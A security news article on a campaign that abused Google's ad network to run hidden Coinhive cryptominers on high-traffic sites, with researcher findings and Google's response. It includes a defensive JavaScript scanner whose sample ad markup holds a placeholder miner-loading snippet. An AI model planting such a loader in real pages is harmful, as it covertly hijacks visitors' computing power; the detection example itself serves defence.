Google’s Ad Network exploited to serve browser crypto miners

Hackers have been actively exploiting Google’s ad network to deliver silent cryptominers on high-traffic sites.

Trend Micro researchers detected an almost 285% increase in the number of Coinhive miners on January 24 and started seeing an increase in traffic to five malicious domains on January 18, according to a Jan. 26 blog post.

Researchers spotted two different web miner scripts embedded in the pages along with a script that displays the advertisement from DoubleClick. Victims will see a legitimate advertisement while two silent cryptominers run in the background.

“We speculate that the attackers’ use of these advertisements on legitimate websites is a ploy to target a larger number of users, in comparison to only that of compromised devices,” researchers said in the post.

The advertisement contains JavaScript code that generates a random number between 1 and 101. If the generated number is above 10, the script calls coinhive.min.js to mine using 80% of the CPU power, which is what happens nine out of ten times, researchers added.
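Because the miner is loaded only when the random check passes, watching network requests on a single page load can miss it, while a static check of the ad markup does not depend on the outcome. The following is an added example, not code from Trend Micro or from the campaign: it flags `<script>` elements that reference `coinhive.min.js` in a `src` attribute or inline. The sample markup, the host names and the `loadScript` helper are constructed placeholders.

```javascript
// Added example: static check of ad markup for references to a miner library.
// The indicator list holds only the file name mentioned in the article.
const INDICATORS = ["coinhive.min.js"];

// Constructed sample markup (not captured from the campaign); hosts are placeholders
// and loadScript is a hypothetical helper name.
const SAMPLE_AD = `
<div class="ad-slot">
  <script src="https://ads.example/render.js"></script>
  <script>
    var n = Math.floor(Math.random() * 101) + 1;
    if (n > 10) { loadScript("https://miner.example/lib/coinhive.min.js"); }
  </script>
  <script src="//cdn.example/COINHIVE.MIN.JS?v=2"></script>
</div>`;
const CLEAN_AD = `<div><script src="https://ads.example/render.js"></script></div>`;

// Last path segment of a URL-like string, lower-cased, without query or fragment.
function fileName(src) {
  const path = src.split(/[?#]/)[0];
  return path.slice(path.lastIndexOf("/") + 1).toLowerCase();
}

// Return one finding per <script> element that references an indicator,
// either as the file named in its src attribute or inside its inline body.
function findMinerReferences(html, indicators = INDICATORS) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  let index = 0;
  while ((m = scriptRe.exec(html)) !== null) {
    const srcMatch = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(m[1]);
    const src = srcMatch ? (srcMatch[1] ?? srcMatch[2] ?? srcMatch[3]) : null;
    const body = m[2].toLowerCase();
    for (const ind of indicators) {
      const needle = ind.toLowerCase();
      if (src && fileName(src) === needle) {
        findings.push({ script: index, where: "src", indicator: ind, value: src });
      } else if (body.includes(needle)) {
        findings.push({ script: index, where: "inline", indicator: ind, value: null });
      }
    }
    index++;
  }
  return findings;
}

console.log(findMinerReferences(SAMPLE_AD));
```

A file-name match is a coarse indicator: a renamed or self-hosted copy of the library would not be flagged by this check.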

Trend Micro researchers weren’t the only ones to spot the problem. Independent researcher Diego Betto spotted YouTube serving ads laced with CPU-draining Coinhive Monero cryptominers late last week.

“During normal browsing on YouTube, at some point, the antivirus Avast reported something that was not good,” Betto said in a Jan. 25 blog post. “From the Chrome Inspector it appears that one of the ads is infected and tries to load a crypto miner from Coinhive.”

Betto wasn’t the only one to notice the silent cryptominers as others voiced their frustration across Twitter and other social media channels.

In addition to the attackers stealing CPU cycles, the malicious JavaScript in some cases was also accompanied by graphics that displayed ads for fake AV programs that scam people out of money and often contain malware. The researchers reported everything to Google.

“Mining cryptocurrency through ads is a relatively new form of abuse that violates our policies and one that we’ve been monitoring actively,” a Google spokesperson told SC Media. “We enforce our policies through a multi-layered detection system across our platforms which we update as new threats emerge. In this case, the ads were blocked in less than two hours and the malicious actors were quickly removed from our platforms.”

About The Author

Sam Reed

InfoSec researcher and Security awareness advocate. Tech-writer with marketing, social media background.
